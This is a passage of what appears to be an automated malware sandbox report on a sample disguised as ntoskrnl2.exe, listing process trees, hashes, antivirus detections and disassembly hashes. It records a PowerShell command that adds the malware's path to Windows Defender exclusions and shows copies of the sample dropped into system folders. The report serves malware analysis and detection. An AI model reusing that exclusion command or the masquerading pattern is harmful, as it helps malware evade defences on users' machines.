                                                                            Has exited:true

                                                                            General

                                                                            Target ID:28
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:29
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ntoskrnl2.exe'
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:30
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:31
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:32
                                                                            Start time:10:32:59
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\09VUCC0aBk.bat"
                                                                            Imagebase:0x7ff79d670000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:33
                                                                            Start time:10:32:59
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:34
                                                                            Start time:10:33:00
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\Containers\GFIYCbjKVID.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Containers\GFIYCbjKVID.exe
                                                                            Imagebase:0x70000
                                                                            File size:1'430'164 bytes
                                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 76%, ReversingLabs
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:35
                                                                            Start time:10:33:00
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\Containers\GFIYCbjKVID.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Containers\GFIYCbjKVID.exe
                                                                            Imagebase:0xbb0000
                                                                            File size:1'430'164 bytes
                                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:36
                                                                            Start time:10:33:00
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\chcp.com
                                                                            Wow64 process (32bit):false
                                                                            Commandline:chcp 65001
                                                                            Imagebase:0x7ff770e00000
                                                                            File size:14'848 bytes
                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:37
                                                                            Start time:10:33:01
                                                                            Start date:11/01/2025
                                                                            Path:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            Imagebase:0x590000
                                                                            File size:1'430'164 bytes
                                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:38
                                                                            Start time:10:33:01
                                                                            Start date:11/01/2025
                                                                            Path:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            Imagebase:0x130000
                                                                            File size:1'430'164 bytes
                                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:39
                                                                            Start time:10:33:01
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\PING.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:ping -n 10 localhost
                                                                            Imagebase:0x7ff701790000
                                                                            File size:22'528 bytes
                                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:40
                                                                            Start time:10:33:06
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                            Imagebase:0x7ff6ef0c0000
                                                                            File size:496'640 bytes
                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:42
                                                                            Start time:10:33:11
                                                                            Start date:11/01/2025
                                                                            Path:C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe"
                                                                            Imagebase:0xdb0000
                                                                            File size:1'430'164 bytes
                                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 76%, ReversingLabs
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:9.9%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:3
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 6386 7ff84931ae5f 6387 7ff84931aeb6 QueryFullProcessImageNameA 6386->6387 6389 7ff84931b004 6387->6389

                                                                              Executed Functions

                                                                              Function 00007FF84931AE5F Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2133501206.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff849310000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID: FullImageNameProcessQuery
                                                                              • String ID:
                                                                              • API String ID: 3578328331-0
                                                                              • Opcode ID: 33f8da9f37885232ea7284a45c9a6b0452886cb22851756c1c0ecb3333e10344
                                                                              • Instruction ID: 1582f65161180ec5adfb58dee4c838b0de4e359074b07d8ed6b0d93ed939fb51
                                                                              • Opcode Fuzzy Hash: 33f8da9f37885232ea7284a45c9a6b0452886cb22851756c1c0ecb3333e10344
                                                                              • Instruction Fuzzy Hash: 3B71C270518A8C8FDB68EF18C8567F977E1FB59311F10827EE84EC7292DB74A8458B81
                                                                              Function 00007FF848F417A2 Relevance: .4, Instructions: 412COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 28c2ca0edb03d19a5f806bc77670b62f92f01758aca8f98e1339afe681fd855f
                                                                              • Instruction ID: 010e37bededebdc442beff23b301409ba669923bb25e2251468a963fc5e0c5ef
                                                                              • Opcode Fuzzy Hash: 28c2ca0edb03d19a5f806bc77670b62f92f01758aca8f98e1339afe681fd855f
                                                                              • Instruction Fuzzy Hash: 4BE10732D0E6D55FE342E72CA8651EA7FA0FF52654F1801BBC0889B1E3DF1D58898356
                                                                              Function 00007FF848F40A19 Relevance: .3, Instructions: 281COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a6939b0d9dc5fdf9806ca027d70e9ad86bb7489377765fcb71b0e5445ddb8a98
                                                                              • Instruction ID: 76a6f0cbe4d6aed30c25963690eb3d4bedff2b442f35a705df8c97353d656920
                                                                              • Opcode Fuzzy Hash: a6939b0d9dc5fdf9806ca027d70e9ad86bb7489377765fcb71b0e5445ddb8a98
                                                                              • Instruction Fuzzy Hash: 51713625A1CA4A4EF399773C48552B976C2EBD6B91F24023ED8CFC32C3DE2C68074249
                                                                              Function 00007FF848F4083D Relevance: .2, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9978a3928dae35b16ceb2838d1e3a6bc9f5d582cb5844b1bada01dcad7ef9e64
                                                                              • Instruction ID: a22ae734a90b4e98e90ebb0557b8ded52caa1c5671d7861fdeee69a0d6aed0ec
                                                                              • Opcode Fuzzy Hash: 9978a3928dae35b16ceb2838d1e3a6bc9f5d582cb5844b1bada01dcad7ef9e64
                                                                              • Instruction Fuzzy Hash: 51512332E1CA588FE794FB3884492BA7BE0FF98745F05017BE48AD7293DE2498418741
                                                                              Function 00007FF848F41C45 Relevance: .1, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 50144959dd297233247885c5c0e091662624b81157638dbb9ee02c6a2e7f59e3
                                                                              • Instruction ID: c9c73bc6fcdbf2bd7f8925ae522f4abb6caadd3ece37c64f94f1e047b979c290
                                                                              • Opcode Fuzzy Hash: 50144959dd297233247885c5c0e091662624b81157638dbb9ee02c6a2e7f59e3
                                                                              • Instruction Fuzzy Hash: 6541BE71A09A8A8FE388DF28D8583EA7FE1EB19744F50017FC008D33A2DBBD14448745
                                                                              Function 00007FF848F4155D Relevance: .1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 02f0f2b0d1b3a19f68233d472c51425baa8d3578426605d875663b8b131f7b21
                                                                              • Instruction ID: ae5c12a6bd140bb141b1f46e9ef52b7828e5e329a0aed041ac8a3500c676390e
                                                                              • Opcode Fuzzy Hash: 02f0f2b0d1b3a19f68233d472c51425baa8d3578426605d875663b8b131f7b21
                                                                              • Instruction Fuzzy Hash: 7331C231A0D6999FE702FBB898151E9BBB0EF623A1F1841B7C044D71C3EB385589C795
                                                                              Function 00007FF848F412E8 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1cc8236aff8235e0f3f551a6dfec2eeeac29d583f92c5bddcd073423dffcff97
                                                                              • Instruction ID: cbc5d8615b0236292e4ec783381f47d6e0ad9c778fd169cc0eac0fa299e9932e
                                                                              • Opcode Fuzzy Hash: 1cc8236aff8235e0f3f551a6dfec2eeeac29d583f92c5bddcd073423dffcff97
                                                                              • Instruction Fuzzy Hash: BF210730B2CA590FE788F72C945D77A36C2EBAC751F4404BAE40DC32D3DD289C418285
                                                                              Function 00007FF848F40CB9 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b1dbaa2944f23555d92d257c3c3a80f99e21208a06002b90296ab0b9b5011f11
                                                                              • Instruction ID: 93f0310e39cb200a7f0d621d988b035698779f54fba419282048adb16039f8bd
                                                                              • Opcode Fuzzy Hash: b1dbaa2944f23555d92d257c3c3a80f99e21208a06002b90296ab0b9b5011f11
                                                                              • Instruction Fuzzy Hash: D6219571A0C3560AE3B9762C6C112757BE1DFE5680F18017BD88AD22C3EE0EA80943D8
                                                                              Function 00007FF848F40868 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5fa710e0212d0417744b97b8181941a35b9cf7a474149e45f1a4efcce6617f0f
                                                                              • Instruction ID: 81228c7e4f3b932fe1bde540bf9489e2df702d2927b252742194dbf72bd75118
                                                                              • Opcode Fuzzy Hash: 5fa710e0212d0417744b97b8181941a35b9cf7a474149e45f1a4efcce6617f0f
                                                                              • Instruction Fuzzy Hash: E411E73295C7584FD7A0BB3858495EB7BE4FB9D255F11063FE89AD3282DB3094058782
                                                                              Function 00007FF848F41588 Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47e7bc57def5f02b20b49e3f47109b50ab983d8b4b41dc7ee3d7b51f9623b44f
                                                                              • Instruction ID: 6142fea02a621b6c8d0ac2205c5b03674f814872ef83255f929cc6647269654f
                                                                              • Opcode Fuzzy Hash: 47e7bc57def5f02b20b49e3f47109b50ab983d8b4b41dc7ee3d7b51f9623b44f
                                                                              • Instruction Fuzzy Hash: F6119A31A0D6998FEB02FB78C8510D8BFB0EF12351F1841B7C084DB192E638A6498781
                                                                              Function 00007FF848F41E1D Relevance: .1, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f9d657fa0babdc366b20da70c9db1dab0ab5e288403829e86914d8c0eca27377
                                                                              • Instruction ID: 8ef364b931da614a067768f8e3894b68f01ee33c9eee5cdef0902640ca2372b0
                                                                              • Opcode Fuzzy Hash: f9d657fa0babdc366b20da70c9db1dab0ab5e288403829e86914d8c0eca27377
                                                                              • Instruction Fuzzy Hash: 5301263088E6E25FD35657709C315A27FA0DF97650B0901FBD085CB5E3C94D28C2C3A1
                                                                              Function 00007FF848F41590 Relevance: .0, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae1f1cda32df40df3dc8ee7e809fdade32cd3404ef51c0d01cc72354c4b33176
                                                                              • Instruction ID: 228f4803208601ab2335ba239e5a0084b80704259a5848dca569600e3934a43c
                                                                              • Opcode Fuzzy Hash: ae1f1cda32df40df3dc8ee7e809fdade32cd3404ef51c0d01cc72354c4b33176
                                                                              • Instruction Fuzzy Hash: C1115B31A0D6998FE702EB78C9551D9BFB0EF12351F1841E7C084DB192EA38AA898795
                                                                              Function 00007FF848F41598 Relevance: .0, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bbe238bc64a77522ec22a324505af246892058f9d4f5d404cbfa73fe138db69b
                                                                              • Instruction ID: d174d80422bc6c57fe8b55443fce0f10c38066a3ad382b22de2e7f9fa420ae7e
                                                                              • Opcode Fuzzy Hash: bbe238bc64a77522ec22a324505af246892058f9d4f5d404cbfa73fe138db69b
                                                                              • Instruction Fuzzy Hash: CD018C3190D6898FE702EB74C9541DDBFB0EF12350F1842E7C044DB1D2EA38AA88C785
                                                                              Function 00007FF848F415A0 Relevance: .0, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c52c5ed657ee54271d8fb9be7b8e8fc7d1ffcc2832b31e63349aa220f8629a68
                                                                              • Instruction ID: 37a19fa957fa88e48d8757db28ecbac1c177822f6c96e0dc6fcb8c94e37e309d
                                                                              • Opcode Fuzzy Hash: c52c5ed657ee54271d8fb9be7b8e8fc7d1ffcc2832b31e63349aa220f8629a68
                                                                              • Instruction Fuzzy Hash: 1F015A3090D2898FE702EB64895419DBFB0EF16340F1842E7C045DB192EA389A84C744
                                                                              Function 00007FF848F41E50 Relevance: .0, Instructions: 27COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a98586db1acdf5ff0a2050b64e5ae6e6db45de0e2d9f996eda9c04565686374c
                                                                              • Instruction ID: bd49d52d77a188a7cd3fccc595a0468869dd9550cb926bb82a27c1599671424e
                                                                              • Opcode Fuzzy Hash: a98586db1acdf5ff0a2050b64e5ae6e6db45de0e2d9f996eda9c04565686374c
                                                                              • Instruction Fuzzy Hash: 86E07D30D4C8291BD76CB63478615B57390EB49610F0505BEC01AC36C3DD1C1CC183C1
                                                                              Function 00007FF848F44D19 Relevance: .0, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                                              • Instruction ID: e2de89b7dc663fb167da6925a40e075919ea9f436fd0545db7e4e49c8be6d3d8
                                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                                              • Instruction Fuzzy Hash: 12E01230E0C12A4BFB54B788C850BB96290EF68740F1041BAD94EF33C2DE38AE45DB59
                                                                              Function 00007FF848F42759 Relevance: .0, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 38c294af2fbeaaa76d369183498b24be2d754abff6ad9db2c6b5e29de6d4f36e
                                                                              • Instruction ID: 3ce87cafb08a5662636bb9494e2ad9a9772cc478315b733d558e88b13e0b6005
                                                                              • Opcode Fuzzy Hash: 38c294af2fbeaaa76d369183498b24be2d754abff6ad9db2c6b5e29de6d4f36e
                                                                              • Instruction Fuzzy Hash: 1BD09E31D1C5558EDB55DA188498768BB91FB58744F1542B5C80CA3286C7359E81DB44
                                                                              Function 00007FF848F41765 Relevance: .0, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                                              • Instruction ID: 25a201621a88507bd1d9450efb855f7defd72bd43c4a6b1ff9bf2f8632a7cb6e
                                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                                              • Instruction Fuzzy Hash: E2C08C34529808CFC908FB7DCC8890833B0FB1A304BC200A1E00DC72B2D219DCD2C781
                                                                              Function 00007FF848F40705 Relevance: .0, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                                              • Instruction ID: 13d8e12c8c43e535dc27aed35d1c8f5c675aaa1d7fe9e1b75f70b26a61f3bae1
                                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                                              • Instruction Fuzzy Hash: 1DC08C20D9E81B09E620336918860ACA1009BF4ED0FE00133C90CA00C3AE0D21C505AB
                                                                              Function 00007FF848F40728 Relevance: .0, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2130923827.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction ID: f1edc2db4faf52e30014c1ec62aa36b325807caa3cdad2805f4e5d3d82a1dfc8
                                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction Fuzzy Hash: 1EB01210CAE80E05D71433B50C8706470005BD45C0FC00271D408D00C3E94D11D40266

                                                                              Non-executed Functions

                                                                              Function 00007FF849319DDD Relevance: .7, Instructions: 692COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2133501206.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff849310000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f6d1df292c15b75eb85b5fc8152cb352ecd18a768a627c34c22c80edf20d9b82
                                                                              • Instruction ID: e76962b27d74914df3de5093c4106504b0d5f7dd755f8b31685d178d22ec11fb
                                                                              • Opcode Fuzzy Hash: f6d1df292c15b75eb85b5fc8152cb352ecd18a768a627c34c22c80edf20d9b82
                                                                              • Instruction Fuzzy Hash: E922F531E1C9595FE798FF6894576BA73E1FF9A350F10017AD00EC32E2EE2868428746
                                                                              Function 00007FF849317B63 Relevance: .1, Instructions: 125COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2133501206.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false
